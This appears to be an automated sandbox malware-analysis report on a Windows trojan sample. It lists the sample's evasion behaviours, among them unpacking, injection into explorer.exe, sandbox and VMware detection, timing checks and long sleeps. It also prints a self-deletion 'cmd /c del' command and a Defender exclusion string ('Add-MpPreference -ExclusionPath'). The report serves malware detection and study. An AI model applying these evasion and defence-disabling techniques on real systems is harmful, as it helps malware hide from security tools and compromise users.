Source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374857258.00000000017DF000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs tlBHrCrteFXy8Jz.exe
Source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.376107685.00000000036CE000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameEXPLORER.EXEj% vs tlBHrCrteFXy8Jz.exe
Source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374555186.000000000164F000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs tlBHrCrteFXy8Jz.exe
Source: tlBHrCrteFXy8Jz.exe Binary or memory string: OriginalFilenameASCIIEncodi.exe4 vs tlBHrCrteFXy8Jz.exe
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe File read: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe:Zone.Identifier Jump to behavior
Source: tlBHrCrteFXy8Jz.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe "C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe"
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process created: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process created: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe" Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tlBHrCrteFXy8Jz.exe.log Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@6/4
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4684:120:WilError_01
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: tlBHrCrteFXy8Jz.exe, zz/no.cs Cryptographic APIs: 'CreateDecryptor'
Source: tlBHrCrteFXy8Jz.exe, zz/no.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.tlBHrCrteFXy8Jz.exe.f00000.0.unpack, zz/no.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.tlBHrCrteFXy8Jz.exe.f00000.0.unpack, zz/no.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.tlBHrCrteFXy8Jz.exe.f00000.0.unpack, zz/no.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.tlBHrCrteFXy8Jz.exe.f00000.0.unpack, zz/no.cs Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.tlBHrCrteFXy8Jz.exe.a20000.1.unpack, zz/no.cs Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.tlBHrCrteFXy8Jz.exe.a20000.1.unpack, zz/no.cs Cryptographic APIs: 'CreateDecryptor'
Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.3.unpack, zz/no.cs Cryptographic APIs: 'CreateDecryptor'
Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.3.unpack, zz/no.cs Cryptographic APIs: 'CreateDecryptor'
Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.7.unpack, zz/no.cs Cryptographic APIs: 'CreateDecryptor'
Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.7.unpack, zz/no.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: tlBHrCrteFXy8Jz.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: tlBHrCrteFXy8Jz.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: tlBHrCrteFXy8Jz.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: explorer.pdbUGP source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.375162074.0000000003380000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: ASCIIEncodi.pdb source: tlBHrCrteFXy8Jz.exe
Source: Binary string: wntdll.pdbUGP source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374179231.0000000001530000.00000040.00000800.00020000.00000000.sdmp, tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374555186.000000000164F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.512009666.000000000530F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.510583143.00000000051F0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374179231.0000000001530000.00000040.00000800.00020000.00000000.sdmp, tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374555186.000000000164F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000010.00000002.512009666.000000000530F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.510583143.00000000051F0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: explorer.pdb source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.375162074.0000000003380000.00000040.10000000.00040000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: tlBHrCrteFXy8Jz.exe, ar/VN.cs .Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.tlBHrCrteFXy8Jz.exe.f00000.0.unpack, ar/VN.cs .Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.tlBHrCrteFXy8Jz.exe.f00000.0.unpack, ar/VN.cs .Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.2.tlBHrCrteFXy8Jz.exe.a20000.1.unpack, ar/VN.cs .Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.3.unpack, ar/VN.cs .Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.7.unpack, ar/VN.cs .Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.9.unpack, ar/VN.cs .Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.1.unpack, ar/VN.cs .Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.0.unpack, ar/VN.cs .Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.5.unpack, ar/VN.cs .Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.2.unpack, ar/VN.cs .Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
.NET source code contains method to dynamically call methods (often used by packers)
Source: tlBHrCrteFXy8Jz.exe, zz/no.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.tlBHrCrteFXy8Jz.exe.f00000.0.unpack, zz/no.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.tlBHrCrteFXy8Jz.exe.f00000.0.unpack, zz/no.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 11.2.tlBHrCrteFXy8Jz.exe.a20000.1.unpack, zz/no.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.3.unpack, zz/no.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.7.unpack, zz/no.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.9.unpack, zz/no.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.1.unpack, zz/no.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.0.unpack, zz/no.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.5.unpack, zz/no.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.2.unpack, zz/no.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 0_2_08574EC4 push eax; ret 0_2_08574EC5
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_0041B87C push eax; ret 11_2_0041B882
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_0041B812 push eax; ret 11_2_0041B818
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_0041B81B push eax; ret 11_2_0041B882
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_0041C88D push edx; iretd 11_2_0041C88E
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_004151A6 push CCBB5791h; iretd 11_2_004151AC
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_00415C48 push esp; retf 11_2_00415C4B
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_0040753A push eax; retf 11_2_0040753B
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_0041B7C5 push eax; ret 11_2_0041B818
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0526D0D1 push ecx; ret 16_2_0526D0E4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F9C88D push edx; iretd 16_2_02F9C88E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F9B87C push eax; ret 16_2_02F9B882
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F9B81B push eax; ret 16_2_02F9B882
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F9B812 push eax; ret 16_2_02F9B818
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F951A6 push CCBB5791h; iretd 16_2_02F951AC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F9B7C5 push eax; ret 16_2_02F9B818
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F95C48 push esp; retf 16_2_02F95C4B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F9C560 pushfd ; iretd 16_2_02F9C561
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F8753A push eax; retf 16_2_02F8753B

Hooking and other Techniques for Hiding and Protection
barindex
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\explorer.exe Process created: /c del "C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe"
Source: C:\Windows\SysWOW64\explorer.exe Process created: /c del "C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe" Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 0.2.tlBHrCrteFXy8Jz.exe.335d944.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.tlBHrCrteFXy8Jz.exe.33dd334.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.303068640.00000000033C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tlBHrCrteFXy8Jz.exe PID: 6248, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.303068640.00000000033C9000.00000004.00000800.00020000.00000000.sdmp, tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.303068640.00000000033C9000.00000004.00000800.00020000.00000000.sdmp, tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 0000000002F88604 second address: 0000000002F8860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 0000000002F8898E second address: 0000000002F88994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe TID: 6252 Thread sleep time: -34409s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe TID: 6284 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_004088C0 rdtsc 11_2_004088C0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\explorer.exe API coverage: 8.3 %
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Thread delayed: delay time: 34409 Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 0000000D.00000000.335963239.0000000008C73000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 30d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000D.00000000.320225868.0000000008A32000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000000D.00000000.320225868.0000000008A32000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000D.00000000.322692727.000000000EDF0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Byf
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000000D.00000000.354025996.0000000008B4E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 0000000D.00000000.322692727.000000000EDF0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}xy
Source: explorer.exe, 0000000D.00000000.354025996.0000000008B4E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 0000000D.00000000.344872504.00000000048E0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000D.00000000.322692727.000000000EDF0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}WCCAWLGRE.jpg.l
Source: explorer.exe, 0000000D.00000000.353740473.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 0000000D.00000000.354025996.0000000008B4E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 0000000D.00000000.353740473.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000000D.00000000.404874828.00000000069DA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD002
Source: explorer.exe, 0000000D.00000000.322692727.000000000EDF0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: ?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f563
Source: explorer.exe, 0000000D.00000000.322692727.000000000EDF0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging
barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_004088C0 rdtsc 11_2_004088C0
Enables debug privileges
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0521AD30 mov eax, dword ptr fs:[00000030h] 16_2_0521AD30
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052DE539 mov eax, dword ptr fs:[00000030h] 16_2_052DE539
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h] 16_2_05223D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h] 16_2_05223D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h] 16_2_05223D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h] 16_2_05223D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h] 16_2_05223D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h] 16_2_05223D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h] 16_2_05223D34
